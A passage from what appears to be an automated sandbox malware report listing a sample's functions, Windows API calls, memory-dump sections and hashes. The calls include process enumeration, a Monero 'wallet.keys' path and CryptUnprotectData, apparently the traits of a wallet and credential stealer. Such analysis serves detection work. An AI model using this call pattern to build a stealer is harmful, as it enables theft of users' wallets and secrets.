                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,*w$1P_d$fgj$u/?n
                              • API String ID: 0-3981488543
                              • Opcode ID: 5223fe923dc9b4427c25a5eb8981b04538b621a0de107cdd3283eb2a44b5f183
                              • Instruction ID: 19cddadc8b3015579e45996876ed5fdd69f1f2df408cb5c52e13b5e1ac20d20a
                              • Opcode Fuzzy Hash: 5223fe923dc9b4427c25a5eb8981b04538b621a0de107cdd3283eb2a44b5f183
                              • Instruction Fuzzy Hash: EAB238F3A082049FE3046E2DEC8577ABBE9EF94360F1A853DEAC4C7744E93558058696
                              Function 00868680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008705B7), ref: 008686CA
                              • Process32First.KERNEL32(?,00000128), ref: 008686DE
                              • Process32Next.KERNEL32(?,00000128), ref: 008686F3
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • CloseHandle.KERNEL32(?), ref: 00868761
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: bc537ad5771eaf457c0701775dc59a9454ed48070e488b5eac103f93f3632e0d
                              • Instruction ID: 699ed352cb0cd6ef736cae6c3e98cabb62e6174587219529c60a17b5309e6cad
                              • Opcode Fuzzy Hash: bc537ad5771eaf457c0701775dc59a9454ed48070e488b5eac103f93f3632e0d
                              • Instruction Fuzzy Hash: 12313C71901218EBCB28DF98DC45FEEB778FB55700F1141AAA50AF61A0DF346A45CFA2
                              Function 00868EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00855184,40000001,00000000,00000000,?,00855184), ref: 00868EC0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 452a4b60ff7015cdf05b949ce6813d13645c508aae7ddd992d9e829418081809
                              • Instruction ID: d21c220d4a8f4c6e0ee2cb56cf43cd738428e70f0ae8b5970f25039701f4e276
                              • Opcode Fuzzy Hash: 452a4b60ff7015cdf05b949ce6813d13645c508aae7ddd992d9e829418081809
                              • Instruction Fuzzy Hash: 83110674200208EFDB00CFA4E885FAA37A9FF89304F109649F919CB250DB35E841DB60
                              Function 00859AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00854EEE,00000000,?), ref: 00859B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859B2A
                              • LocalFree.KERNEL32(?,?,?,?,00854EEE,00000000,?), ref: 00859B3F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: f89af8047f156d3a5af7ffe5b94651ed4494b0cf62391327071926eb3a1e74bf
                              • Instruction ID: b65a4ab74db0699e54d2ae2f9cf18d03253fdf945f70f7486fdca0d0250c4bb8
                              • Opcode Fuzzy Hash: f89af8047f156d3a5af7ffe5b94651ed4494b0cf62391327071926eb3a1e74bf
                              • Instruction Fuzzy Hash: 8D11A4B4240208EFEB10CFA4DC95FAA77B5FB89711F208059FD199B390CB75A901CB91
                              Function 00867980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00870E00,00000000,?), ref: 008679B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008679B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00870E00,00000000,?), ref: 008679C4
                              • wsprintfA.USER32 ref: 008679F3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: d9da66257da71cd2c3c5263a9697000ecfa2e00bb9d5f5b7f4d0273e8a54c846
                              • Instruction ID: a120bd2bad6ece39b6ba1841a22db09cfc5d41037037b02a771bedb62be0258d
                              • Opcode Fuzzy Hash: d9da66257da71cd2c3c5263a9697000ecfa2e00bb9d5f5b7f4d0273e8a54c846
                              • Instruction Fuzzy Hash: 31112AB2A04118ABCB14DFC9DD45BBEB7F8FB4CB11F10415AF605A2280D6395941C7B1
                              Function 00867A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015CDFA0,00000000,?,00870E10,00000000,?,00000000,00000000), ref: 00867A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015CDFA0,00000000,?,00870E10,00000000,?,00000000,00000000,?), ref: 00867A7D
                              • wsprintfA.USER32 ref: 00867AB7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 2b175f18f82b8b7512816c8aa9d0df58bc8b37a901fba3262c0afdbbfe60554f
                              • Instruction ID: 36a7964cbff2105b5dfa8bec3079ab7884d864287929abe946edd67e2eb6d38e
                              • Opcode Fuzzy Hash: 2b175f18f82b8b7512816c8aa9d0df58bc8b37a901fba3262c0afdbbfe60554f
                              • Instruction Fuzzy Hash: D2117CB1A45228EBEB20CB94DC49FA9B778FB04721F1042DAE91A932C0CB745A40CF91
                              Function 00863720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0086E118,00000000,00000001,0086E108,00000000), ref: 00863758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008637B0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 039df4665b2edb0b5f4021b1819525a3e226a6dbeec755413e335076242723df
                              • Instruction ID: e9028a30115f062252acf3e676357699c35ec54dc79c80515deb8ac3599e4e96
                              • Opcode Fuzzy Hash: 039df4665b2edb0b5f4021b1819525a3e226a6dbeec755413e335076242723df
                              • Instruction Fuzzy Hash: 38410670A00A289FDB24DB58CC85BDBB7B4FB48302F4041D9A608E72D0E7716E85CF50
                              Function 00859B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00859B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00859BA3
                              • LocalFree.KERNEL32(?), ref: 00859BD3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: ba418c79fb2de2d7807daec23efdd09efe359942d959da9b37538269e5d85410
                              • Instruction ID: 0298cdd5057ee83522fff00e2c4b1bacd7fe69c41ec63762d452ba70fd0630b4
                              • Opcode Fuzzy Hash: ba418c79fb2de2d7807daec23efdd09efe359942d959da9b37538269e5d85410
                              • Instruction Fuzzy Hash: 0611C9B8A00209EFDB04DF94D985AAE77B5FF88300F104599ED15A7390D770AE15CFA2
                              Function 00C20F06 Relevance: 4.1, Strings: 2, Instructions: 1613COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 07j9$B.K
                              • API String ID: 0-1843767294
                              • Opcode ID: 286c90e830bac092199c8af7753e03304b04ff9b5b3299769c1eca2c2e7fe238
                              • Instruction ID: fc8fa79448a7a8fc3a2e286f04a52b6fd3fd1d8d0f78bd7d775a306eec869235
                              • Opcode Fuzzy Hash: 286c90e830bac092199c8af7753e03304b04ff9b5b3299769c1eca2c2e7fe238
                              • Instruction Fuzzy Hash: 95B238F360C6049FE304AE2DEC8567AFBE9EF94220F1A893DE6C4C7744E63558058697
                              Function 00B103EF Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =$ =
                              • API String ID: 0-2912459995
                              • Opcode ID: 9e0eb6aa07f461678ea1acd813ff0944a7f295cb6e46440d163e25431c426831
                              • Instruction ID: bf38330098eecf4e52726b71022bcc3c3c6aa6684f11e3e674783c381a0cbc12
                              • Opcode Fuzzy Hash: 9e0eb6aa07f461678ea1acd813ff0944a7f295cb6e46440d163e25431c426831
                              • Instruction Fuzzy Hash: A66136F3E086144FE314AA2DDD8573AF6D5EBD4310F1B863DDB8993B84E9385C048686
                              Function 00AF1A76 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 10Oo$N.g#
                              • API String ID: 0-3840764527
                              • Opcode ID: 390b93b14e4ca7e21ee5cf94ebb1a3043631a4564de5a0bdb00ab7e610388062
                              • Instruction ID: 3b52a01b3e3489c1cc5131d4926b0179fc79164b900713fcde8e9b06574611db
                              • Opcode Fuzzy Hash: 390b93b14e4ca7e21ee5cf94ebb1a3043631a4564de5a0bdb00ab7e610388062
                              • Instruction Fuzzy Hash: 244116B36083085FE318BE2DEC85A2AF7E9EB94710F0A463DEBC5C3355F97159058692
                              Function 00C123C5 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
